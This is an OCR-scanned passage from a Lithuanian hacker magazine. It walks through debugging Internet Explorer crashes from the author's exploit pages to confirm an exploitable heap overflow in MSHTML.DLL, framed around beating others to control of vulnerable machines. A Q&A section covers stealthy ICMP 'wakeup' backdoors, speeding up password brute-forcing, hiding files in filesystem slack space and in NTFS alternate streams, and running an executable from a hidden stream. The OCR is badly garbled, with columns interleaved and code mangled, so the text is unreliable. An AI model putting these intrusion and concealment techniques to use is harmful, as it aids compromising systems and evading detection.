įmanomas. Telieka išsiaiškinti, kur būtent jis įvyksta ir kaip shell-kodui 
perduoti šturvalą, 


Pradedam kapstyti 

DrWatson savo logą išsaugo kataloge Documents8Settings/All 
Users/Documents/DrWatson, ten pat patenka ir nulūžusios pro- 
gramos atminties turinys (dump). Pastarasis perrašomas kiekvieną 
kartą, o loge pagal nutylėjimą išsaugomi 10-ties paskutinių klaidų 
duomenys, čia patenka ir mūsų eksploitų sukelti sutrikimai 

FAR'e atsidarom drwtsn32.log (spausk <F4>) ir ieškom eilučių, ku- 
rios būtų susijusios su tam tikru laiku įvykusiais IE sutrikimais (juk 
mes nepamiršome pažiūrėti į laikrodį, tiesa?). 

Išimtis programoje: 
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Praleisdami nenaudingą informaciją apie paleistus procesus ir užkrau- 
tas dinamines bibliotekas, mes prisikasame iki disasembliuoto kodo, 
saugomo iedie2-2 eksploito sutrikimo apylinkėse: 


Pabandykime atstatyti įvykių chronologiją ir išsiaiškinti, kas gi čia įvy- 
ko. Mums žinoma, kad instrukcija MOV EDI, ([EBX+0X34], kuri randasi 
adresu 75AD7E2Eh ir kuri saugoma MSHTML.DLL gelmėse, sukėlė 
priėjimo pažeidimotipo išimtį, kadangi EBX registre buvo reikšmė 1 Ah, 
ty. jis rodė į pirmuosius atminties regiono 64 Kb, prie kurių priėjimas 
griežtai draudžiamas kaip tik siekiant sugaudyti tokias nekorektiškas 
rodykles. Tačiau iš kur EBX registre atsiradotaneaiški reikšmė 1 Ah? Kil- 
damidisasembliuotulistingu aukštyn, mes surandameinstrukciją MOV 
EBX, EAX, kuri kopijuoja EAX turinį į EBX. EAX reikšmę grąžina funk- 
cija DllGetClassObject+0x1f573, esanti adresu 75AD7E43h. Svarbu 
suprasti, kad ji niekaip nesusijusi su pačia DllGetClassObject! Tiesiog 
DrWatson nerado simbolinės informacijos, todėl paėmė artimiausios 
jam žinomos funkcijos adresą ir nurodė jį vietoje bazinio. 
Kai kas pradeda aiškėti. Funkcija 75AD7E43h turi grąžinti rodyklę į 
duomenų struktūrą, nuo kurios pasislinkus per 34h randasi dar viena 
) rodyklė, tačiau, prisirūkiusi eksploito, ji grąžino kažkokią nesąmonę. 


Noriu priminti, jog sutrikimas įvyko uždarant IE, t.y. kada HTML kodo | 


| apdorojimasjaubuvobaigtas. Ištoseka, kad patifunkcija 75AD7E43h 


čianė prie ko (jos net galima nedisasembliuoti), o priežasties reikėtų | 


. ieškoti duomenų struktūrų pažeidimuose, su kuriais ši funkcija dirba. 
Dabar išstudijuokime su /Edie2-3 susijusį sutrikimą, kurio disasem- 
bliuotos apylinkės atrodo štai taip: 
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2222-2322 222. aa 


Čia sutrikimo adresas visai kitas (75ACC4DAh, o prieš tai buvo 
75AD7E2Eh), tačiau biblioteka ta pati — MSHTML.DLL, o ir įvykių 
chronologija labai panaši į ankstesnę. Išimtis įvyksta ties instrukcija 
MOV EAX,[EAX+0X420] su registru EAX, kurio reikšmė lygi nuliui ir 
kurį grąžino funkcija 75A9211Dh (žr. CALL 75A9211D), kuri pagal 
idėją turėjo grąžinti rodyklę į objektą arba duomenų struktūrą, tačiau 
negrąžino, kadangi atmintis buvo sugadinta! 

Mestaip patturime bylą user.dmp, kurią prieš savomirtį sukūrėlE. Šią 
bylą galima užkrauti į derintuvą WinDbg (file -> open crush dump), 
kuris jeina į DDK sudėtį, tačiau čia mes nesužinosime nieko naujo. 
Ši byla — tai miręs kūnas, programos lavonas. Jame neveikia trasa- 
vimo komandos, čia viskas, ką mes galime — tai atminties, steko ir 
registrų peržiūra, tačiau mes juos irtaip žinom, už ką reikėtų padėkoti 
DrWatson sukurtai ataskaitai. Kur kas didesnės galimybės atsiveria 
disasembliuojant MSHTML.DLL ir gyvas derinimas pagal lūžimo vie- 
tą (just-in-time debugaing), kuo mes dabar ir užsiimsim. 


Į WinDbg užkrauta byla 


Kasam giliau 

Imam bylą MSHTML.DLL (jiyea kataloge (WINNTSystem32) ir už- 
krauname ją į IDA Pro arba kitą disasemblerį (vis tiek nerasit nieko 
geriau už IDA Pro). Michal Zalewski savo pranešime skundėsi dėl 
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Aprašyta technologija leidžia sekti daug atminties blokų 
praktiškai nesumažinant našumo. Parašyti ir suderinti įskiepį 
galima tiesiog per vakarą. 


Kr——7777—+———-77-——-——m2 


PagrindinisdisasemblerioIDAPro5.Olangas pagalnutylėjimą. Irkaip 
gisujuo dirbti?! Pereiti į normalų režimą galima paspaudus tarpą 


išeities tekstų nebuvimo, kas smarkiai apsunkina analizę. Ką gi, mes 
iš tiesų neturime IE išeities tekstų, tačiau mes galime gauti derinimo 
simbolius. Čia saugomi visų neeksportuojamų funkcijų pavadinimai 
ir struktūrų bei objektų apibrėžimai. 

IDA Pro 5.0 iš msdl.microsoft.com automatiškai parsisiunčia visų 
sisteminių bylų simbolius, telieka sukomanduoti: file -> load file 
-> PDB file. Senesnėse versijose tai tenka daryti rankiniu būdu. 
Pradžiai mums prireiks „Debugging Tools for Windows“ paketo, 
kurį Microsoft platina nemokamai: www. microsoft.com/whdc/dev- 
tools/debugging/. Parsisiunčiame savo operacinei sistemai skirtą 
versiją, įdiegiam, užeinam į katalogą /bin, ten surandame įrankį 
symchk.exe ir jį paleidžiame štai tokiu būdu; 


Rankinis simbolinės informacijos užkrovimas 


set src=C/WINNTSYSTEM321MSHTML.DLL 
symchk ?6src?6 /s srv* Vhttp://msdl.microsoft.com/download/ 
symbols -v 


Programa lenda į tinklą ir greitai (arba nelabai — viskas priklauso 
nuo tavo ryšio kanalo!) diske sukuriami du nauji katalogai: Nnsh- 
tml.dbgV38D12257243000 su byla mshtml.dbg (2,8 Mb) ir Vmsh- 
tml.pdbV38051D9A2 su byla mshtml.pdb (2,1 Mb). Tiesą sakant, 
šios bylos perduodamos suspaustos, todėl realiai parsiunčiama 
viso labo =1,5 Mb. Ką gi, dbg byla mums visiškai neįdomi (ten 
saugomi išeities tekstų eilučių numerius atitinkančių mašininių ko- 
mandų adresai, kurių pas mus vis tiek nėra), tuo tarpu pdb mes 
tuojau pat užkrausim į IDA Pro kartu su visa simboline informacija, 
kuria Microsoft nusprendė pasidalinti su mumis. Prieštai rekomen- 
duojamaiš Debugging Tools įšakninį IDA Pro katalogą perkopijuoti 
dinaminę biblioteką dbghelp.dll, nes priešingu atveju pdb.plw gali 
neveikti. 

Vis tik prieš užkraunant simbolius pereikime į sutrikimo vietą ir pa- 
žiūrėkim, kaip atrodo originalus disasembliuotas tekstas. Spau- 
džiam <G> (goto) ir įvedame adresą „75ACC4DA“, kurį mums 
pranešė DrWatson. Mes atsiduriame mums jau pažįstamoje pro- 
cedūroje, kuri iškviečia bevardę funkciją 75A9211Dh, apie kurios 
paskirtį kol kas galima tik spėlioti; 


Disasembliuotas tekstas prieš simbolinės informacijos užkrovimą 
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text:75ACC4C0 sub 75ACC4C0 proc near 


text: 75ACC4C0 push esi 

text:75ACC4C1 mov esi, eCx 

text: 75ACC4C3 call sub 75A9211D 

text: 75ACC4C8 mov si, [esi+6Ch] 

text:75ACC4CC test si, si 

text:75ACC4CF 1Z short loc 75ACC4E9 . 
text:75ACC4D1 movzx BCX, Si į 
text: 75ACC4D4 imul ecx, 98h 

text:75ACC4DA mov eax, [eax+420h] ; sutrikimas 
text:75ACC4E0 pop esi 

text: 75ACC4E1 Iea eax, [ecx+eax-98h] 

text:75ACC4E8 retn 


text:75ACC4E9 
text:75ACC4E9 loc 75ACC4E9: 


text:75ACC4E9 mov eax, oliset unk 75C8D1A0 
text:75ACC4EE pop esi 
text:75ACC4EF retn 


text:75ACC4EF sub 75ACC4C0 endp 
text:75ACC4EF 


Posimbolinėsinformacijos užkrovimo (file-> load file-> PDB file) šislistin- 
gasradikaliai pasikeičia ir mes gauname ganėtinai prasmingąvaizdą: 


Tas pats disasembliuotas tekstas po simbolinės informacijos užkrovimo 
;struct INSTANTCLASSINFO*  thiscall COleSite::GetlnstantClass Info(void) 


text:75ACC4C0 ?GetlnstantClassintodCOleSited o 
CAEPAUINSTANTCLASSINFOGM3XZ proc near 


text:75ACC4C0 push esi 

text:75ACC4C1 mov esi, eCx 

text:75ACC4C3 call ?GetDocPtra 
CElementa0OABEPVC Doc A6XZ;CElement::GetDocPtr() 

text:75ACC4C8 mov si, [esi+6Ch] 

text:75ACC4CC test si, Si 

text:75ACC4CF jz short loc 75ACC4E9 

text:75ACC4D1 movzx ECx, Si 

text:75ACC4D4 imui ecx, 98h 

text:75ACC4DA mov eax, [eax+420h] ; sutrikimas 

text:75ACC4E0 pop esi 

text:75ACC4E1 lea eax, [ecx+eax-98h] 

text:75ACC4E8 rein 


text: 75ACC4E9 
text:75ACC4E9 loc 75ACC4E9 


text: 75ACC4E9 mov eax, Offset 79 

ciNullad3UCLASSINFO BA ;CLASSINFO g ciNull 
„text:75ACC4EE pop esi 
text:75ACC4EF rein 


text:75ACC4EF ?GetlnstantClasslnioeCOleSitea—- 
GAEPAUINSTANTCLASSINFO06XZ endp 


Dabar mes žinome, kad sutrikimas įvyko funkcijoje CO/eSite:: 
GetlnstantClassInfo(void), kuri grąžina rodyklę į struktūrą INS- 
TANTCLASSINFO. Deja, bet pdb byloje nėra struktūrų aprašymų 
(Microsoft klastingumas nežino ribų!), tačiau net ir nepilna simbo- 
linė informacija kur kas geriau, nei nieko! 

Dėl padorumo šiek tiek paburbėjus, užsiimkime funkcijos CElement:: 
GetDocPtr(void) disasembliavimu, kuri EAX registre grąžino nulį, ir 
pažiūrėkime, kas ir kodėl jai nurovė stogą: 
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Pranešimas apie kritinę klaidą su pasiūlymu paleisti just-in-time 
derintuvą 


Panaudojant ECX registrą kaip rodyklę į objektą, ji iš jo išgauna dar 
vieną rodyklę, užkrauna ją į EAX, otada, panaudodama gautą EAX 
kaip rodyklę, tame pačiame EAX grąžina rodyklę į objektą, kurį ji 
turi grąžinti. Vienok mūsų atveju grąžinamas nulis, kas rodo, jog čia 
sugriaunama sudėtinga duomenų struktūrų hierarchija 
Disasembleris neleidžia pasakyti, kokiame etape įvyko šis sugrio- 
vimas. Čia gali būti sugadintas tiek bazinis blokas, į kurį rodo ECX, 
tiekir adresu *(ECX+10h) esantis blogas. O gali būti ir taip, kad taip 
nutiko dar anksčiau, tačiau programa nulūžotik dabar. Kad nereikė- 
tųburtiiškavostirščių, pasinaudokime just-in-time derintuvu, vietoje 
kurio mes vėl griebsimės populiariojo O/lyDbg (www.allydbg.de/). 


Prisikasam iki tiesos 

Paleidžiam OllyDbg, nueiname į meniu „options“ ir pasirenkame 
„just-in-time debugging“ bei pasirodžiusiame dialogo lange nu- 
spaudžiame mygtukus „make OllyDbg just-in-time debugger“ ir 
„confirm before attaching“. Išeiname iš derintuvo ir su IE užkrau- 
name IEdie2-3. 

Pokuriolaiko pasirodo dialogo langas su pranešimu, jog programa kažką 
padarė ne taip. „OK“ — užbaigia IE darbą, „Cancel“ — paleidžia just-in- 
time derintuvą. 

Atsidūrę derintuve, mes atsiduriame mums jau pažįstamoje sutrikimo 
vietoje, esančioje adresu 75ACC4DAh. Daugkartiniai IE paleidimai 
rodo, kad sutrikimai įvyksta pačiose įvairiausiose vietose, tačiau visa- 
da po funkcijos GetDocPtr() iškvietimo, o kartais ir pačios GetDocPtr() 
viduje. Kaip tau tai patinka? 
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Nuspaudę <Shift-F9>, mes galime ignoruoti išimtį ir pratęsti pro- 
gramos vykdymą, tačiau nei jai, nei mums nuo to geriau nebus, juk 
duomenų struktūros pavirto į beprasmišką baitų jovalą, o mes neži- 
nome, kada jos buvo sugadintos. 

Tenka dinozauro skeletą rekonstruoti tiesiog po vieną kauliuką. Visų 
pirma, mes turime išsiaiškinti, kur rodė ECX iškviečiant GetDocP- 
tr(). Žiūrim į steką: jo viršūnėje randasi grįžimo į motininę procedūrą 
adresas 75ACC4C8h. Nueiname čia su disasembleriu (arba su pa- 
čiu derintuvu nuspaudus <CTRL-G>, 75ACC4C8h) ir matom, kad 
prieš funkcijos GetDocPtr iškvietimą registras ECX buvo išsaugotas 
ESI registre: 


hack 


Iš to seka, kad sutrikimo metu ESI registras rodo į struktūrą, iš ku- 
rios užkraunami registrai ECX ir EAX. Tris kartus nuspaudę <TAB> 
pereiname į dump'o langą, tada spaudžiam <CTRL-Gs> ir įvedame 
ESI registrą arba tiesiog jo reikšmę OE552B0Oh. Tai ir yra ta duome- 
nų struktūra, su kuria mes jau susidūrėme disasembleryje ir kuri, 
sprendžiant iš atminties žemėlapio, saugoma kažkur krūvelėje 
(heap). Tiesą sakant, OllyDbg nemoka dirbti su krūva, todėl reikia 
turėti tam tikrų tyrinėtojo įgūdžių, kad iš bendros masės išskirti dina- 
minės atminties blokus. SoftlCE čia būtų parodęs kur kas daugiau 
informacijos, tačiau mes jau nusprendėme naudoti Olly, todėl geriau 
nekeiskime arklių pačiame įkarštyje). 

Komanda MOV EAX, [ECX+10], kuri turėtų grąžinti rodyklę, grąžino 
nulį, dėl ko po jos sekanti komanda MOV EAX, [EAX+0Ch] tapo su- 
trikimo šaltiniu. Tai tikrų tikriausias objekto CElement sugadinimas, 
tačiau mes dar turėsime sužinoti, kas jį sugadino ir kodėl. Bet kokiu 
atveju, objekto neištrynė eilutė „AAA...AAA", nes tuomet dump'e 
matytųsi daugybė A simboliui atitinkančių ASCII kodų (41h), o jų 
ten nėra. Kaip tai nėra?! Kur gi dingo mūsų eilutė? Mes tuojau pat ją 
surasime atmintyje ir sužinosim! 

Spaudžiam <ALT-M> — tokiu būdu iškviečiamas „memory“ langą, 
tada su klavišu „home“ pereiname į adresų erdvės pradžią ir palei- 
džiam paiešką spausdami <CTRL-B>. Be abejo, ieškoti reikia nau- 
dojant Unicode. Tokia eilutė randama du kartus. Pirmą kartą — ste- 


miedxį ju) sio Ma 


Eilutės AAA...AAA paieška atmintyje 


ke, adresu 000C00FOh, kartu su „<OBJECTtype=" irvisomis kitomis 
eilutėmis, o antrą kartą — krūvelėje (heap), adresu 00E51A60h, kur 
po jos eina dar viena „AAA...AAA" eilutė ir... daugiau nieko. Aha! 
Sprendžiant iš visko, IE sugebėjo apdoroti tik du objektus, po ko 
įvyko perpildymas, sukeliantis išimtį ir avarinį darbo užbaigimą. At- 
kreipk dėmesį, kad eilutė „AAA...AAA“" (00E50600h) randasivisiškai 
arti nuo duomenų struktūros, į kurią rodo ECX—00E552B0Oh, vienok 
juos skiria padorus baitų kiekis, todėl jeigu perpildymas ir įvyksta, 
taip nutinka tikrai ne čia, Ką gi, kapstysime toliau! Juo labiau, kad 
mes turime puikią galimybę tyrimą pradėti dar prieš nusikaltimą, 
sukūrus sustojimo tašką ties... 

Pala, o ties kuo mes jį kursime?! Tikrai ne ties funkcija GetDocPitr(), 
kadangi ją iškviečiant duomenys jau sugadinti. Būtų puiku pereiti į 
patį atminties bloką ir pažiūrėti, kas jį sugadina, tačiau, nelaimei, jis 
išskiriamas dinamiškai, todėl jo adresą numatyti neimanoma (juo 
labiau, kaip jau minėjau, sutrikimai įvyksta skirtingose vietose). 
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Netnejsivaizduoju, ką mes darytumėm, jeigu mums po ranka nebū- 
tų derinimo simbolių, tačiau jie yra! Mes žinome, kad atminties bloką 
su sugadinama duomenų struktūra inicializuoja CElement klasės 
konstruktorius, kuriam priklauso funkcija GetDocPtr(), todėl mes 
turime surasti konstruktorių, ties juo sukurti sustojimo tašką ir sekti 
visus kuriamus objektus. Sugrįžtame į IDA Pro, spaudžiam <Ctrl- 
Page Up> ir taip pereinam į listingo pradžią, spaudžiam <ALT-T> 
(paieškalistinge)irrašom,, thiscallCElement::CElement“ (taip pa- 
gal C++ kalbos taisykles apibrėžiamas konstruktorius). Nepraeina 
nėminutė, kaip IDA Pro suranda ieškomą eilutę adresu 75AA321 Bh 
(šiaip tai surasti konstruktorių galima ir be derinimo simbolių, žr. 
„Hakeriavimo pagrindai", kurių elektroninę kopiją nemokamai gali 
parsisiųsti iš fp:/nezumi.org.ru, tačiau tam reikia laiko, kurio mes 
neturime, okovoje už eksploitus brangi kiekviena sekundė, kadangi 
reikiaanksčiauužkitus užgrobti pažeidžiamų mašinųvaldymą, tada 
sukurti didelę dronų armiją ir pasijausti Čingischanu) 


Disasembliuotas objekto CElement konstruktoriaus tekstas 


text:75AA321B ; public: thiscall CEl lement(enum ELEMENT TAG, 


text:75AA321B 770) er OAEGW4ELEMENT TAGGGPAVCDOC Z 
proc nes 
text:75AA321B 
text:75AA321C 
text:75AA7 


mov 


mov 


mo 
text:75AA3230 nc 
text: 75AA3233 call 
text: 75AA3238 
text:75AA323B 
text:75AA323F 
text: 75AA7 1 
text: 75A, 47 xOr 
text:75AA3249 mov 
text:75AA324B mov 
text:75AA324E pop 
text: 75AA324F rein 
text:75A 7270CElementūt00AECMW4ELEMENT TAGGGPAVCDocAC 


endp 


and 


Persijungiame į derintuvą, pereiname į CPU langą, spaudžiam 
<CTRL-G>,įvedame konstruktoriaus adresą 75AA321B, sukuriame 
sustojimo tašką ties funkcijos pradžia ir su <Ctrl-F2> perleidžiame 
derintuvą. Beje, sustojimo taškas turi būti ne programinis (ne tas, 
kuris kuriamas su <F2>), o būtinai aparatinis (užvedame kursorių 
prie eilutės 75ACC4C0h, spaudžiam <Shift+F10>, pasirodžiusia- 
me kontekstiniame meniu pasirenkame breakpoint-> hardware, on 
execution). Kadangi biblioteka MSHTML.DLL užkraunama dina- 
miškai, programinį sustojimo tašką, kuris šiuo atveju yra mašininė 
instrukcija INT 03h (opkodas CCh), negailestingai ištrina sisteminis 
užkrovėjas, todėl jis čia ir nesudirba. 

OllyDbg turėtų būti gėda, kadangi ji neišsaugo derinamo proceso 
komandinės eilutės argumentų jo perleidimo metu, todėl IE užtikrin- 
tai pasileidžia ir užkrauna jam nurodytą Home puslapį, todėl eks- 
ploitą tenka užkrauti rankiniu būdu per „File-> Open -> Browse -> 
IEdie2-3.html“. Šį kartą IE jau nelūžta, o taikiai nuvirsta į derintuvo 
rankasties sustojimo tašku! 
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Konstruktorius iškviečiamas daug kartų, todėl norint sekti kiekvieno 
objekto inicializacijos procesą, reikia pereiti į dump'o langą ir suko- 
manduoti <ZTRL-G>, ECX, kur ECX — registras, kuriame konstruk- 
toriui perduodama rodyklė į konstruojamą objektą. 

Pradedame trasuoti programą ir į priekį judame lyg išminuotojai per 
minų lauką, atkreipdami dėmesį į menkiausius operatyvinės aplin- 
kos niuansus. Pasirodo, kad konstruktorius atlieka tik pirminę inici- 
alizaciją, o su objektu dirba daugybė funkcijų, kiekviena kurių gali 
pasirodyti besanti duomenų sugadinimo šaltiniu, Norint susiaurinti 
paieškos lauką, susikoncentruokime ties vienu vieninteliu lauku, ku- 
ris nuo objekto pradžios yra nutolęs per 10h (būtent iš čia funkcija 
GetDocPtr nuskaito klaidingą rodyklę, kuri ir sukelia sutrikimą). Kaip 
rodo trasavimas, jis inicializuojamas dar konstruktoriuje, ką padaro 
kelios komandos: MOV EAX,[ESP+ARG 4]/MOV [ESI+10H],EAX. 
Viskas aišku! Reikia sukurti sąlyginį sustojimotaškąties šiuo adresu, 
kuris suveiktų tuo atveju, kai EAX rodo į negaliojantį regioną. Ste- 
bint sugadintą bloką, galima padaryti išvadą, kad už 10h baitų nuo 
objekto pradžios nutolusiame lauke saugomos reikšmės gali būti 
bet kokios iš intervalo nuo 00h iki -100h. 

Kadangi OllyDbg kol kas dar nepalaiko sąlyginių aparatinių sustoji- 
motaškų, tenka į pagalbą kviestis galingąjį SoftICE. Paleidžiame IE, 
su<CTRL-D> iškviečiame SoftlCE, su komanda „ADDRIEXPLORE“ 
perjungiame kontekstą, su komanda „BPM 75AA322D X IF EAX < 
100“ sukuriame sąlyginį sustojimo tašką, išeiname iš derintuvo ir su 
IE atidarome mūsų bandomąjį „iedie2-3.html". Vis tiek nieko neišei- 
na. Tai reiškia, kad klaida slypi ne konstruktoriuje ir ne jį iškviečian- 
čioje funkcijoje. Tai labai gudrus perpildymas, todėl norint jį aptikti, 
reikia sukurti specialų įrankį — nuosavą derintuvą arba OllyDbg/ 
SoftlCE įskiepį, kuris atliktų šiuos veiksmus: 

+ Sukurtų aparatinį sustojimo tašką ties konstruktoriumi CElement:: 
CElement ir įsimintų jam per ECX registrą perduodamą rodyklę; 

+ Išeinant iš konstruktoriaus iš pirmojo atminties bloko puslapio at- 
imtų visus priėjimo atributus (PAGE NOACCESS); 

+ Stebėtų išimtis, kurios susidaro kreipiantis į puslapius, ir sektų 10h 
lauką; 

+ Aptikus bandymą įrašyti negaliojančią nuorodą, valdymą perduo- 
tų derintuvui, vienaip ar kitaip signalizuodamas apie klaidą. 
Aprašyta technologija leidžia sekti daug atminties blokų praktiškai 
nesumažinant našumo. Parašyti ir suderinti įskiepį galima tiesiog 
per vakarą. Skaityk tai savo namų darbais arba lauk, kol Internete 
pasirodys paruošti koviniai eksploitai. 


Toliau pats 

Išanalizavus problemą, mes patvirtinome, kad pažeidžiamumas 
egzistuoja, o apdorojant įdėtus OBJECT'us įvyksta krūvos (heap) 
perpildymas, leidžiantis ne tik nulaužti IE, bet ir perduoti valdymą 
shell-kodui,vienok čiamumstekssusidurti su DEP tipo apsaugomis, 
mokytis atmintyje surasti API funkcijas ir įsisavinti daug kitų dalykų, 
kurie išsamiai aprašyti „Kompiuterinių virusų tyrinėtojo užrašuose“ 
ir „Portable shell-coding under NT and linux“, kuriuos, kaip įprasta, 
gali parsisiųsti iš ftp://nezumi.org.ru. 
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G: Kas yra wakeupbekdoras ir kaip jis 
veikia? 
A: Wakeup bekdoras, kaip ir reikėtų suprasti 


iš paties pavadinimo, — tai bekdoras, kurį no- 
fint priversti veikti reikia prieš tai jį pažadinti 
Ši technologija naudojama kai reikia paslėpti 
bekdoro buvimą sistemoje (nuo netstat ir jung- 
čių skenerių). Ši technologija pagrįsta ICMP 
protokolo ypatybe, jog šis visiškai nenaudoja 
tinklo jungčių, o bet kokius icmp pranešimus. 
priima ir išsiunčia IP posistemė. Po paleidimo 


wakeup bekdoras darbui su ICMP protoko-, 


lu sukuria RAW soketą ir, neatidarinėdamas 


jungties, laukia specialaus icmp paketo. Ga: 


vęs wakeup paketą bekdoras paima jame 


nurodytą jungties numerį ir sukuria įprastinį 
"TCP arba UDP soketą bei pasiruošia priimti jjei= 
nančius susijungimus. Užbaigus sesiją jungtis 
uždaroma, o bekdoras vėl tampa nematomas 


gi wakeup bekdoras sukuria RAW soketą, jo 
paleidimuireikiarootteisių. Savaime supranta- 
ma, be mano aprašyto tiesioginio susijungimo 
| (direct) wakeup bekdoras gali būti padarytas 
taip, kad veiktų panaudodamas connect back 
susijungimą, t.y. gavus wakeup paketą bek- 
|doras neatidarinėja TCP arba UDP jungties, o 
"savarankiškai jungiasi atsiųstame pakete nu- 
rodytu adresu. 

Paprastai wakeup paketo pasiuntimui naudo- 
jamas atskiras įrankis (icmpsend), tačiau kai 
kurie wakeup bekdorai pažadinimui taip pat 
naudoja ping su opcija -p, kuri leidžia siųsti 
| duomenis 

Daugelį wakeup bekdorų išeities tekstų kartu 
su įrankiu icmpsend galima rasti žymios rusų 
blackhatų komandos m00 archyve adresu 
http:/m00.blackhat.ru/mOO-archive.lar.bz2 
(čia ieškok bdpack. tar. gz) 


G: Daugelis hakeriškų įrankių rei- 
kalauja prieš tai įdiegti //bpcap arba 


„kosreikalingos? 
A: Daugelis žinomų įrankių, tokių, kaip nmap, 


tcpdump, Snortir kitų naudoja vieną arba iš kar 


"to abi paminėtas bibliotekas. Biblioteka libnet 
(www.packetfactory.net/libnet/) programuotoją 


Jibnet bibliotekas. Kam šios bibliote- 


aprūpina viskuo, ko reikia laisvai pasirinkto for- 


matoirturiniotinklo paketams generuotibeisiųs- 


AS 10 -=+ 1 = 


jungčių skeneriams ir įrankiui netstat. Kadan- 


ti. Biblioteka //bpcap (www.tcpdump.org) skirta 
priešingam tikslui — paketų išgavimui iš tinklo ir 
jų analizei. Programuotojas vienoje programoje 
galiįdarbinti iš karto abi šias bibliotekas. 


G: Aš slaptažodžiams perrinkti naudo- 
ju programą Brutus. Ją paprasta nau- 
doti, tačiau aš iki šiol nežinau, ką joje 
reiškia opcija Keep-Alive? 

A: Keep-Alive —tai ne šiaip sau brutforserio op- 
cija, oTCP mechanizmas, leidžiantis serverinėms 
programoms susijungimą su klientu išlaikyti ne- 
ribotai ilgą laiką. Ypatingą reikšmę tai turi dirbant 
Su www serveriais. Dažniausiai pagal nutylėjimą 
www serveris pasiunčia atsakymą į užklausą ir 
tuojau pat nutraukia susijungimą, tokiu atveju 
HTTP atsakymo antraštėje paprastai būna tokia 
eilutė: „Connection: close“. Tai patogu peržiūrint 
puslapius su naršykle, tačiau brutforsui, kaip tu 
tikriausiai pats supranti, susijungimo nutraukimas 
po kiekvienos užklausos sumažina perrinkimo 
greitį. Vadovaujantis RFC 2068, HTTP užklausoje 
serveriui galima nurodyti, kad jis įjungtų Keep-All- 
ve mechanizmą, t.y. nenutrauktų susijungimo po 
atsakymo į kiekvieną užklausą. Tam į užklausą 
reikia pridėti eilutę „Connection: Keep-Alive“ 
(veikiausiai Brutus būtent tai ir daro, kai jam 
nurodoma KeepAlive opcija) 
Žemiau pateikiu tokios su 
telnetmanolokaliamApa- 
che ww serveriui 
siunčiamos 
užklausos 
pavyzdį 


mr 


GET/HTTPAA 
Host:127.0.0.1 
Connection:Keep-Alive 


Jeigu serveris pripažįsta Keep-Alive mecha- 
nizmą, tai HTTP atsakymo antraštėje bus maž- 
daug tokios eilutės: 


HTTP/1.1 200 OK 


Keep-Alive: timeout=15, max=100 
Connection: Keep-Alive 


Parametras timeout= 15 reiškia, kad susijungi- 

mas bus palaikomas dar 15 sekundžių, ir jeigu 

klientas per šį laiką nerodys jokio aktyvumo, 

serveris susijungimą nutrauks. Parametras: 
max reiškia, kad laiko tarpas gali būti padidin- 

tas iki 100 sekundžių. 

Deja, daugelyje internete veikiančių www ser- 

verių Keep-Alive mechanizmas atjungtas, to- 

dėl smarkiai juo pasikliauti nederėtų. 


| G: Ilgą EI TA jokios apsaugos 
| nuobuferioperpildymokrūvoje (heap). 


(B 


t 
| 
| 
| 
| 


" = 


„apsauga nuo buferio perpildymo krūvoje. 


Ar dabar jau kažkas pasikeitė? 


vietose. Tokiu atveju paslėpti duomenys bus vi- 
siškai nematomi sistemoje, vietos diske taip pat 
nesumažės, jų taip pat neaptiks bylų vientisumo 
tikrinimo įrankiai, kurie naudoja bylų kontrolinės: 
sumos apskaičiavimo algoritmą (CRC). Šiektiek! 
paaiškinsiu, kas gi tai per „silpnosios vietos“. 


Failų sistema adresuoja disko erdvės dalis, ku- 


rios vadinamos blokais. Paprastai bloko dydis: 


ex!2/ext3 failų sistemose yra 1, 2 arba 4 Kb. Jei- 


gu bylos dydis mažesnis už bloko dydį, tuomet: 


likusi laisva vieta yra paprasčiausiai iššvaistomą 
tuščiai. Taiirvadinama „silpna vieta". Pavyzdžiui, 
žemiau pateikta komanda bylą /ile.Ixt įrašo į „sil- 
pnąjąvietą“, sukurtą bylai/etc/passwa: 


Acatfile.txt|bmap --mode putslack /etc/passwd 


Okomanda 


4 bmap--mode slack /etc/passwd>file2.txt 


C:>start cAbar.txt:bigfile.exe 


Įdomu tai, kad naudojantis vien tik standarti- 

nėmis Windows priemonėmis neįmanoma 
"rasti sistemoje naudojamų alternatyvių srautų. 

Tam reikalingi papildomi įrankiai, pavyzdžiui, 

ads cat (www.securityfocus.com/tools/1814). 

Ši programa gali ne tik aptikti, bet ir pašalinti 
"alternatyvius srautus. 


G: Kaipį VMwaresistemąjdiegti Softice? 
A: Bendraipaėmus derintuvas į VMware įdiegia= 
mas taip pat, kaip ir įprastinėje sistemoje. Tiesa, 
priešįdiegimą VMware sistemoje geriau padary- 
ti: File -> Install VMware Tools. Tačiau po įdiegi- 
mo gali prasidėti problemos, pavyzdžiui, klavišų 
kombinacija Ctr/+D gali „pakabinti“ virtualią sis- 
temą. Įdiegiant Driver Studio kataloge VOriver- 
Studio Books) sukuriamas dokumentas „Using 
SoftICE.pdf“. Jame Softlce įdiegimui į VMware 
skirtas ištisas skyrius: „Appendix E. SoftlCE and 
VMware“. Kad Softlce stabiliai dirbtų virtualioje 
mašinoje, „Using SoftlCE" dokumente rekomen- 
duojama virtualios mašinos bylą su.vmx praplė- 


A: Iš tiesų, nuo senų laikų sukurta daugybė, „paslėptus duomenis išgauna ir įkelia į bylą || imu pridėti dvi papildomas eilutes: 


apsaugų nuo buferio perpildymo steke, eilu 
tės formatavimo pažeidžiamumo ir kitų klaidų 
Pavyzdžiui, tokios sistemos, kaip StackGuard, | | 
StackShield, ProPolice, Openwall (OWL), | 
Libsafe saugo nuo buferio perpildymo steke. 

PointGuard saugo nuo rodyklių į funkcijas per- 

rašymo. FormatGuard saugo nuo eilutės for- | 


matavimo pažeidžiamumų. RaceGuard saugo | G: O kaip bylas slėpti Windows siste- 


silpnosios vietos“, reikia įvykdyti komandą 


4 bmap -mode wipeslack /etc/passwd 


Išsamiau gali paskaityti dokumentacijoje: man 
map. 


nuorace-conditions. Iš visų jų nebuvo apsau- | moje? 


gos tik nuo buferio perpildymo krūvoje. Tačiau | A: Dėlto, kad dabarvisur naudojamos su NTFS - 
failų sistema veikiančios Windows sistemos, 


inžinerinė mintis nestovi vietoje, o tokia apsau- 
ga jau sukurta! Pavyzdžiui, apsilankius šiuo 
adresu galima išsamiau sužinoti ir parsisiųsti | 
Linux sistemai skirtą Heap protection versiją: : 
www.cs.ucsb.edu/-wkr/projects/heap pro- 
tection/. 

Windows XP SP2 sistemoje taip pat aktyvuot 


| 


tarp hakerių ir virusų kūrėjų paplito mada duo 


u 


nux sistemoje? 

A: Nesiūlysiu tau tokių kvailysčių, kaip „pervadinti 
byląjkąnorsnekrentančiojakį beiiškeltijąįnuoša. 
